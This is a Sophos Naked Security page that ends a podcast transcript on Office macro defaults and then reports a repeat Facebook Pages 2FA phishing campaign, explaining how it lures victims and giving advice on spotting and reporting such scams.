DOUG.  Very good… you can read more about that on the site nakedsecurity.sophos.com.

And as the sun slowly begins to set on our show for this week, it’s time to hear from one of our readers on the Office Macros article.

Keith writes:

“If companies rely on receiving macro-embedded documents from the internet, and accept the risk, they should be the ones that enable it by group policy. Protect the many and force them to allow security exceptions.”

I think that’s a sentiment that’s probably shared by others as well.


DUCK.  Yes.

My first thought when I saw that comment… well, apart from hitting the approve button immediately [LAUGHTER] was, “That’s how it should be.”

Shouldn’t even need to say it… in the same way that who would have thought you need to send a letter to lawyers saying, “Hey, paying the ransom isn’t a good thing to do”!

My gut feeling is that what’s happened with Microsoft is they found that small businesses, including those who are actually keen to adopt Microsoft’s own cloud solutions, are finding that this is actually harder to handle than they would ever have thought.

Som maybe for a while the bigger companies just have to go, “OK, we’ll use group policy; we know how to do that. We’ll just turn this on, leave it on.!

If you do have it on already, by the way, then this change… I don’t think it will makee any difference when it’s turned on because it would already have been on; and although it’s now off by default, i won’t be off on your network.

But the sentiment is absolutely correct.

If there are people who go, “You can’t do that”… the sort of people who say, “I’m not going to put lights on my bicycle. That’s my business, not yours. If you run me over and squash me flat, that’s my problem,” they’re forgetting about the fact that there are all these knock-on effects to the rest of the community when they do things that are insecure.

So I agree: ideally, when we finally decide this is a security feature that’s working out so well we’re going to turn it on for everybody, I absolutely agree that it should be a non-contentious change.

But, like we said earlier in the podcast, it looks as though Microsoft is hoping for just a few weeks of rethinking this.

Though, as we know, the problem with thinking about software things “for a few weeks” is… where does few end and many start?

Is that six weeks, or is 56 weeks “a few”?

When lockdown started, did you think it was going to be 104 weeks, two years, or did you think, “Probably three, maybe eight?”

[LAUGHTER]

In this case, let’s hope that we finish up in a situation where it’s “all’s well that ends well”, and that the default does become more secure for everybody, except for those who insist on turning the feature *off*.


DOUG.  All right, very good.

Thank you for the comment, Keith!

And if you have an interesting story, comment or question you’d like to submit, we’d love to read it on the podcast.

You can email tips@sophos.com; you can comment on any one of our articles; or hit us up on social: @nakedsecurity.

That’s our show for today; thanks very much for listening…

For Paul Ducklin, I’m Doug Aamoth, reminding you: until next time…


BOTH.  Stay secure!

[MUSICAL MODEM]


Facebook 2FA scammers return – this time in just 21 minutes

Have you ever come really close to clicking a phishing link simply through coincidence?

We’ve had a few surprises, such as when we bought a mobile phone from a click-and-collect store a couple of years back.

Having lived outside the UK for many years before that, this was our first-ever purchase from this particular business for well over a decade…

…yet the very next morning we received an SMS message claiming to be from this very store, advising us we’d overpaid and that a refund was waiting.

Not only was this our first interaction with Brand X for ages, it was also the first-ever SMS (genuine or otherwise) we’d ever received that mentioned Brand X.

What’s the chance of THAT happening?

(Since then, we’ve made a few more purchases from X, ironically including another mobile phone following the discovery that phones don’t always do well in bicycle prangs, and we’ve had several more SMS scam messages targeting X, but they’ve never lined up quite so believably.)

Let’s do the arithmetic

Annoyingly, the chances of scam-meets-real-life coincidences are surprisingly good, if you do the arithmetic.

After all, the chance of guessing the winning numbers in the UK lottery (6 numbered balls out of 59) is an almost infinitesimally tiny 1-in-45-million, computed via the formula known as 59C6 or 59 choose 6, which is 59!/6!(59-6)!, which comes out as 59x56x55x54x53x52/6x5x4x3x2x1 = 45,057,474.

That’s why you’ve never won the jackpot…

…even though quite a few people have, over the many years it’s been going.

In the same way, phishing crooks don’t need to target or trick you, but merely to trick someone, and one day, maybe, just maybe, that someone might be you.

We had a weird reminder of this just last night, when we were sitting on the sofa, idly reading an article in tech publication The Register about 2FA scamming.

The first surprise was that at the very moment we thought, “Hey, we wrote up something like this about two weeks ago,” we reached the paragraph in the El Reg story that not only said just that, but linked directly to our own article!

What’s the chance of THAT happening?

Of course, any writer who says they’re not bothered whether other people notice their work or not is almost certainly not to be trusted, and we’re ready to admit (ahem) that we took a screenshot of the relevant paragraph and emailed it to ourselves (“purely for PR documentation purposes” was the explanation we decided on).

Now it gets weirder

Here’s where the coincidence of coincidences gets weirder.

After sending the email from our phone to our laptop, we moved less than two metres to our left, and sat down in front of said laptop to save the attached image, only to find that during the couple of seconds we were standing up

…the VERY SAME CROOKS AS BEFORE had emailed us yet another Facebook Pages 2FA scam, containing almost identical text to the previous one:

What’s the chance of THAT happening, combined with the chance of the previous coincidence that just happened while we were reading the article?

Sadly, given the ease with which cybercriminals can register new domain names, set up new servers, and blast out millions of emails around the globe…

…the chance is high enough that it would be more surprising if this sort of co-incidence NEVER happened.

Small changes to the scam

Interestingly, these crooks had made modest changes to their scam.

Like last time, they created an HTML email with a clickable link that itself looked like a URL, even though the actual URL it linked to was not the one that appeared in the text.

This time, however, the link you saw if you hovered over the blue text in the email (the actual URL target rather than the apparent one) really was a link to a URL hosted on the facebook.com domain.

Instead of linking directly from their email to their scam site, with its fake password and 2FA prompts, the criminals linked to a Facebook Page of their own, thus giving them a facebook.com link to use in the email itself:

This one-extra-click-away trick gives the criminals three small advantages:

  • The final dodgy link isn’t directly visible to email filtering software, and doesn’t pop up if you hover over the link in your email client.
  • The scam link draws apparent legitimacy from appearing on Facebook itself.
  • Clicking the scam link somehow feels less dangerous because you’re visiting it from your browser rather than going there it directly from an email, which we’ve all been taught to be cautious about.

We didn’t miss the irony, as we hope you won’t either, of a totally bogus Facebook Page being set up specifically to denounce us for the allegedly poor quality of our own Facebook Page!

From this point on, the scam follows exactly the same workflow as the one we wrote up last time:

Firstly, you’re asked for your name and other reasonable-sounding amounts of personal information.

Secondly, you need to confirm your appeal by entering your Facebook password.

Finally, as you might expect when using your password, you’re asked to put in the one-time 2FA code that your mobile phone app just generated, or that arrived via SMS.

Of course, as soon as you provide each data item in the process, the crooks are using the phished information to login in real time as if they were you, so they end up with access to your account instead of you.

Last time, just 28 minutes elapsed between the crooks creating the fake domain they used in the scam (the link they put in the email itself), which we thought was pretty quick.

This time, it was just 21 minutes, though, as we’ve mentioned, the fake domain wasn’t used directly in the bogus email we received, but was placed instead on an online web page hosted, ironically enough, as a Page on facebook.com itself.

We reported the bogus Page to Facebook as soon as we found it; the good news is that it’s now been knocked offline, thus breaking the connection between the scam email and the fake Facebook domain:

What to do?

Don’t fall for scams like this.

  • Don’t use links in emails to reach official “appeal” pages on social media sites. Learn where to go yourself, and keep a local record (on paper or in your bookmarks), so that you never need to use email web links, whether they’re genuine or not.
  • Check email URLs carefully. A link with text that itself looks like a URL isn’t necessarily the URL that the link directs you to. To find the true destination link, hover over the link with your mouse (or touch-and-hold the link on your mobile phone).
  • Don’t assume that all internet addresses with a well-known domain are somehow safe. Domains such as facebook.com, outlook.com or play.google.com are legitimate services, but not everyone who uses those services can be trusted. Individual email accounts on a webmail server, pages on a social media platform, or apps in an online software store all end up hosted by platforms with trusted domain names. But the content provided by individual users is neither created by nor particularly strongly vetted by that platform (no matter how much automated verification the platform claims to do).
  • Check website domain names carefully. Every character matters, and the business part of any server name is at the end (the right-hand side in European languages that go from left-to-right), not at the beginning. If I own the domain dodgy.example then I can put any brand name I like at the start, such as visa.dodgy.example or whitehouse.gov.dodgy.example. Those are simply subdomains of my fraudulent domain, and just as untrustworthy as any other part of dodgy.example.
  • If the domain name isn’t clearly visible on your mobile phone, consider waiting until you can use a regular desktop browser, which typically has a lot more screen space to reveal the true location of a URL.
  • Consider a password manager. Password managers associate usernames and login passwords with specific services and URLs. If you end up on an imposter site, no matter how convincing it looks, your password manager won’t be fooled because it recognises the site by its URL, not by its appearance.
  • Don’t be in a hurry to put in your 2FA code. Use the disruption in your workflow (e.g. the fact that you need to unlock your phone to access the code generator app) as a reason to check that URL a second time, just to be sure, to be sure.
  • Consider reporting scam pages to Facebook. Annoyingly, you need to have a Facebook account of your own to do so (non-Facebook users are unable to submit reports to help the greater community, which is a pity), or to have a friend who will send in the report for you. But our experience in this case was that reporting it did work, because Facebook soon blocked access to the offending Page.

Remember, when it comes to personal data, especially passwords and 2FA codes…

If in doubt/Don’t give it out.


go top